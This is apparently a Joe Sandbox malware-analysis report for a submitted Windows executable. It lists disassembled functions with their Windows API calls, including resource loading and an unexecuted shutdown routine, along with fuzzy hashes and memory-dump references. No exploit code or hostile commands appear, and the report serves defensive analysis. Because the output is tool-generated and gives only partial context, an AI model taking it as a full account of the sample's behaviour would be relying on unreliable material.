Associated: 00000000.00000002.3366841293.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3366921215.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3367063646.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: FormatMessage
String ID:
API String ID: 1306739567-0
Opcode ID: 2dc6ecac2658c0303fbeb732946dba8a31d4bcf901e7642ce2bff6997528785c
Instruction ID: 7b38442d06f496379890204edef453c821f476d6c52b93f329ea0e63e965d40b
Opcode Fuzzy Hash: 2dc6ecac2658c0303fbeb732946dba8a31d4bcf901e7642ce2bff6997528785c
Instruction Fuzzy Hash: 17E0D8A0B8830136F22414544C87B77220E47C0700F10807E7700ED3C6D6BEA906815F

Function 004076AC Relevance: 1.5, APIs: 1, Instructions: 11fileCOMMON

Download Yara Rule

APIs

SetEndOfFile.KERNEL32(?,020E7CBC,0040A08C,00000000), ref: 004076B3

Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020D03AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F

Memory Dump Source

Source File: 00000000.00000002.3366892156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3366841293.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3366921215.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3367063646.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: ErrorFileLast
String ID:
API String ID: 734332943-0
Opcode ID: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
Instruction ID: f788b2e916ece263959a2b362e6cc5638f15ca068e5e6b6e193a7bb405067b9b
Opcode Fuzzy Hash: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
Instruction Fuzzy Hash: BEC04CA1A1410047CB40A6BE89C1A1666D85A4821530485B6B908DB297D679E8004666

Function 00406FFB Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(?,00407019), ref: 0040700C

Memory Dump Source

Source File: 00000000.00000002.3366892156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3366841293.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3366921215.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3367063646.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
Instruction ID: c47f2f618e2971e07f5b1abb1c43dc6c143ad8b034d1ddbdae76011a93498253
Opcode Fuzzy Hash: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
Instruction Fuzzy Hash: 54B09B76A1C2415DE705DAD5745153863D4D7C47143A14977F104D35C0D53DA4144519

Function 00407017 Relevance: 1.5, APIs: 1, Instructions: 5COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(?,00407019), ref: 0040700C

Memory Dump Source

Source File: 00000000.00000002.3366892156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3366841293.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3366921215.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3367063646.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
Instruction ID: a55afa0689d716a84ca499c05243e055e04a08b2ab071a0afeb25d409e08decd
Opcode Fuzzy Hash: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
Instruction Fuzzy Hash: FFA022A8C08000B2CE00E2E08080A3C23283A88308BC08BA2320CB20C0C03CE008020B

Function 00406970 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

CharPrevA.USER32(?,?,0040696C,?,00406649,?,?,00406D87,00000000,00406DAC,?,?,?,?,00000000,00000000), ref: 00406972

Memory Dump Source

Source File: 00000000.00000002.3366892156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3366841293.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3366921215.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3367063646.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: CharPrev
String ID:
API String ID: 122130370-0
Opcode ID: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
Instruction ID: 57bb655d476c0b104ac503b4dc16dcc9cc7d9309af7e6782790f501f1b0aeff9
Opcode Fuzzy Hash: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
Instruction Fuzzy Hash:

Function 00407F10 Relevance: 1.3, APIs: 1, Instructions: 62memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00407FA0

Memory Dump Source

Source File: 00000000.00000002.3366892156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3366841293.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3366921215.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3367063646.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: f3d8bc7867bd0b1d1bf8a1a21c6b81e8059d467c94b9dab864cb1ccd8d8ada4e
Instruction ID: 20a67eb23ea55951ef5110b519d4bcc97d420124264edb02c1094051c82f9398
Opcode Fuzzy Hash: f3d8bc7867bd0b1d1bf8a1a21c6b81e8059d467c94b9dab864cb1ccd8d8ada4e
Instruction Fuzzy Hash: D2117571A042059BDB00EF19C881B5B7794AF44359F05807EF958AB3C6DB38EC00CBAA

Function 00401658 Relevance: 1.3, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(?,?,00004000,?,0000000C,?,-00000008,00003FFB,004018BF), ref: 004016B2

Memory Dump Source

Source File: 00000000.00000002.3366892156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3366841293.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3366921215.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3367063646.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
Instruction ID: 63c8255cdd02620dd55efc6405714c3c0a63becca9b218cdeda95617091702f1
Opcode Fuzzy Hash: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
Instruction Fuzzy Hash: 3601A7726442148BC310AF28DDC093A77D5EB85364F1A4A7ED985B73A1D23B6C0587A8

Function 00407548 Relevance: 1.3, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?), ref: 00407558

Memory Dump Source

Source File: 00000000.00000002.3366892156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3366841293.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3366921215.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3367063646.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
Instruction ID: e7ddd8f09f86228f97b62737e097d00c20d119481f2284b048c56b7aa048eabb
Opcode Fuzzy Hash: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
Instruction Fuzzy Hash: 41D05E82B00A6017D615F2BE4D8869692D85F89685B08843AF654E77D1D67CEC00838D

Function 00407EB8 Relevance: 1.3, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(?,00000000,00008000,?,00407E9D), ref: 00407ECF

Memory Dump Source

Source File: 00000000.00000002.3366892156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3366841293.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3366921215.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3367063646.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: c7bedad96efb848ea9f674ed311898bb29a23f2a16fc3a9de009753beeeb9dd9
Instruction ID: 622015b425f940adf6dc1d0f89e873b9c6d17cfe6f0c2733970da1323f12c917
Opcode Fuzzy Hash: c7bedad96efb848ea9f674ed311898bb29a23f2a16fc3a9de009753beeeb9dd9
Instruction Fuzzy Hash: 3ED0E9B17553055BDB90EEB98CC1B0237D8BB48610F5044B66904EB296E674E8009654

Non-executed Functions

Function 00409448 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 41shutdownCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000028), ref: 00409457
OpenProcessToken.ADVAPI32(00000000,00000028), ref: 0040945D
LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00409476
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 0040949D
GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 004094A2
ExitWindowsEx.USER32(00000002,00000000), ref: 004094B3

Strings

SeShutdownPrivilege, xrefs: 0040946F

Memory Dump Source

Source File: 00000000.00000002.3366892156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3366841293.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3366921215.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3367063646.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
String ID: SeShutdownPrivilege
API String ID: 107509674-3733053543
Opcode ID: 5d5c4cc2167cea31fe6e778ad900630fb502c4628614430f67a63468396a48bc
Instruction ID: 55e16e97e4c30333ef6e9d7cb44a764448f3c494fd9ead6bbbdf5d5bb2f9c1eb
Opcode Fuzzy Hash: 5d5c4cc2167cea31fe6e778ad900630fb502c4628614430f67a63468396a48bc
Instruction Fuzzy Hash: 61F012B069830179E610AAB18D07F6762885BC4B18F50493ABB15FA1C3D7BDD809466F

Function 00409BEC Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32(00000000,00002B67,0000000A), ref: 00409BF6
SizeofResource.KERNEL32(00000000,00000000,?,00409CE6,00000000,0040A27D,?,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 00409C09
LoadResource.KERNEL32(00000000,00000000,00000000,00000000,?,00409CE6,00000000,0040A27D,?,00000001,00000000,00000002,00000000,0040A2C5,?,00000000), ref: 00409C1B
LockResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00409CE6,00000000,0040A27D,?,00000001,00000000,00000002,00000000,0040A2C5), ref: 00409C2C

Memory Dump Source

Source File: 00000000.00000002.3366892156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3366841293.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3366921215.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3367063646.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: Resource$FindLoadLockSizeof
String ID:
API String ID: 3473537107-0
Opcode ID: ce7c2a79786de0a8682d58b31ceb4174bbddb2d24ae6ad16542ef9ae896a3e40
Instruction ID: ed04ed1443b666af2c347742ca0221af59beed1f1180006ed42e296f861e82c7
Opcode Fuzzy Hash: ce7c2a79786de0a8682d58b31ceb4174bbddb2d24ae6ad16542ef9ae896a3e40
Instruction Fuzzy Hash: ECE07EA0B483562AFA6076FB08C2B2A018C4BA671DF40003BB701B92C3DEBD8C14856E

Function 00405248 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040544A,?,?,?,00000000,004055FC), ref: 0040525B

Memory Dump Source

Source File: 00000000.00000002.3366892156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3366841293.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3366921215.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3367063646.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 8a1aa2f218564e89e29a3375e8324a6bde157643bf6b6cb70ff1562e164a822c
Instruction ID: 297a7c39c0825e6b478cba46507f56ab37b47465b1590baa0f4eee863dd3b982
Opcode Fuzzy Hash: 8a1aa2f218564e89e29a3375e8324a6bde157643bf6b6cb70ff1562e164a822c
Instruction Fuzzy Hash: AED05EA630E6502AE21051AB2D85EBB4A9CCEC5BA4F18407FF648D7242D6248C069B76

Function 004026C4 Relevance: 1.5, APIs: 1, Instructions: 20timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(?), ref: 004026CE

Memory Dump Source

Source File: 00000000.00000002.3366892156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3366841293.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3366921215.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3367063646.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: SystemTime
String ID:
API String ID: 2656138-0
Opcode ID: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
Instruction ID: 69442b1fa125f02c17f5f00667ba5619268a94e84ed87230136e9e38920861ba
Opcode Fuzzy Hash: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
Instruction Fuzzy Hash: 14E04F21E0010A82C704ABA5CD435EDF7AEAB95600B044272A418E92E0F631C251C748

Function 00405CE4 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32(?,004065E0,00000000,004065EE,?,?,?,?,?,00409C65), ref: 00405CF2

Memory Dump Source

Source File: 00000000.00000002.3366892156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3366841293.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3366921215.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3367063646.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: c84d22a34f8351a77119842959a44d1d4ba95f00f13a202a1719544d7380acd2
Instruction ID: 3c95a3e10eaf3ff9c271e05f7503c1a51fdcfb4de7972086e3eff1de8b037954
Opcode Fuzzy Hash: c84d22a34f8351a77119842959a44d1d4ba95f00f13a202a1719544d7380acd2
Instruction Fuzzy Hash: FDC012A040070186D7109B31EC02B1672D4AB44310F440539AEA4953C2E73C80018A5A

Function 0040840C Relevance: .5, Instructions: 545COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3366892156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3366841293.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3366921215.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3367063646.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7cb438cf7f0ff76753a1d16800e3023f3e313fbbfbb21f985cf38b771b24bb28
Instruction ID: 7dc6dc86846b3232beed044054ddb30c9891ac2fec336679fba6e94018ae2b4c
Opcode Fuzzy Hash: 7cb438cf7f0ff76753a1d16800e3023f3e313fbbfbb21f985cf38b771b24bb28
Instruction Fuzzy Hash: C032D775E00219DFCB14CF99CA80AADB7B2BF88314F24816AD855B7385DB34AE42CF55

Function 00407024 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 86registrylibraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,004098D0), ref: 0040704D
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00407053
RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,004098D0), ref: 004070A1

Strings

GetUserDefaultUILanguage, xrefs: 00407043
kernel32.dll, xrefs: 00407048
Control Panel\Desktop\ResourceLocale, xrefs: 004070B0
.DEFAULT\Control Panel\International, xrefs: 00407078
Locale, xrefs: 00407090

Memory Dump Source

Source File: 00000000.00000002.3366892156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3366841293.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3366921215.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3367063646.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: AddressCloseHandleModuleProc
String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
API String ID: 4190037839-2401316094
Opcode ID: f61943fdfa50da717bbd8070568f426ad52e04842bfe5cc219f36a91d9520f2f
Instruction ID: c068e7fb85b52830e378cef5638f1cf195f9e270113e5aa630163df598a56aa7
Opcode Fuzzy Hash: f61943fdfa50da717bbd8070568f426ad52e04842bfe5cc219f36a91d9520f2f
Instruction Fuzzy Hash: 72214170E04209ABDB10EAB5CC55A9E77A9EB48304F60847BA510FB3C1D7BCAE01875E

Function 00403A97 Relevance: 15.1, APIs: 10, Instructions: 122fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B1E
GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B42
SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B5E
ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00403B7F
SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00403BA8
SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00403BB2
GetStdHandle.KERNEL32(000000F5), ref: 00403BD2
GetFileType.KERNEL32(?,000000F5), ref: 00403BE9
CloseHandle.KERNEL32(?,?,000000F5), ref: 00403C04
GetLastError.KERNEL32(000000F5), ref: 00403C1E

Memory Dump Source

Source File: 00000000.00000002.3366892156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3366841293.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3366921215.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3367063646.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
String ID:
API String ID: 1694776339-0
Opcode ID: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
Instruction ID: 6684f6b4d1923fa93cc5777a7ebe0ca766b8c5f16b1f456132d2f0a6dbb27d3d
Opcode Fuzzy Hash: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
Instruction Fuzzy Hash: 444194302042009EF7305F258805B237DEDEB4571AF208A3FA1D6BA6E1E77DAE419B5D

Function 004019DC Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 59COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.KERNEL32(0040C41C,00000000,00401AB4), ref: 00401A09
LocalFree.KERNEL32(0074F4F0,00000000,00401AB4), ref: 00401A1B
VirtualFree.KERNEL32(?,00000000,00008000,0074F4F0,00000000,00401AB4), ref: 00401A3A
LocalFree.KERNEL32(007504F0,?,00000000,00008000,0074F4F0,00000000,00401AB4), ref: 00401A79
RtlLeaveCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AA4
RtlDeleteCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AAE

Strings

u, xrefs: 00401A5D

Memory Dump Source

Source File: 00000000.00000002.3366892156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3366841293.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3366921215.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3367063646.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
String ID: u
API String ID: 3782394904-1051851173
Opcode ID: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
Instruction ID: 5447b05044442752c1d56c7733342563ab4b4f61826a3093f511f794066d9233
Opcode Fuzzy Hash: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
Instruction Fuzzy Hash: 91116330341280DAD711ABA59EE2F623668B785748F44437EF444B62F2C67C9840CA9D

Function 004053B4 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 167COMMON

Download Yara Rule

APIs

GetSystemDefaultLCID.KERNEL32(00000000,004055FC,?,?,?,?,00000000,00000000,00000000,?,004065DB,00000000,004065EE), ref: 004053CE

Part of subcall function 004051FC: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052C7,?,00000000,004053A6), ref: 0040521A

Part of subcall function 00405248: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040544A,?,?,?,00000000,004055FC), ref: 0040525B

Strings

AMPM, xrefs: 00405599
:mm:ss, xrefs: 004055CA
:mm, xrefs: 004055B0
mmmm d, yyyy, xrefs: 004054BF
m/d/yy, xrefs: 0040549D

Memory Dump Source

Source File: 00000000.00000002.3366892156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3366841293.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3366921215.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3367063646.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: InfoLocale$DefaultSystem
String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
API String ID: 1044490935-665933166
Opcode ID: 85a59d6a8a9452990e87660af54c17acfa7fb51e8ac3fac4a02ccdeae7d05a60
Instruction ID: af1252b4c964b6680b9f9af4a0d1ea0fc67f86ffa9d2e4d8722b1cefb330e960
Opcode Fuzzy Hash: 85a59d6a8a9452990e87660af54c17acfa7fb51e8ac3fac4a02ccdeae7d05a60
Instruction Fuzzy Hash: 25515334B04548ABDB00EBA59C91A9F776AEB89304F50947BB504BB3C6CA3DCE059B5C

Function 00403D02 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 72windowCOMMON

Download Yara Rule

APIs

MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D9D
ExitProcess.KERNEL32 ref: 00403DE5

Strings

Error, xrefs: 00403D91
Runtime error at 00000000, xrefs: 00403D96, 00403DA9
9@, xrefs: 00403D29, 00403D34

Memory Dump Source

Source File: 00000000.00000002.3366892156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3366841293.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3366921215.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3367063646.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: ExitMessageProcess
String ID: Error$Runtime error at 00000000$9@
API String ID: 1220098344-1503883590
Opcode ID: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
Instruction ID: db3008c0e6bc5d60e05df0545d3e9f81ce91e923819fa2a9fb93000da4b6b716
Opcode Fuzzy Hash: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
Instruction Fuzzy Hash: B521F830A04341CAE714EFA59AD17153E98AB49349F04837BD500B73E3C77C8A45C76E

Function 00401918 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

RtlInitializeCriticalSection.KERNEL32(0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040192E
RtlEnterCriticalSection.KERNEL32(0040C41C,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 00401941
LocalAlloc.KERNEL32(00000000,00000FF8,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040196B
RtlLeaveCriticalSection.KERNEL32(0040C41C,004019D5,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 004019C8

Strings

u, xrefs: 0040195A

Memory Dump Source

Source File: 00000000.00000002.3366892156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3366841293.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3366921215.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3367063646.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

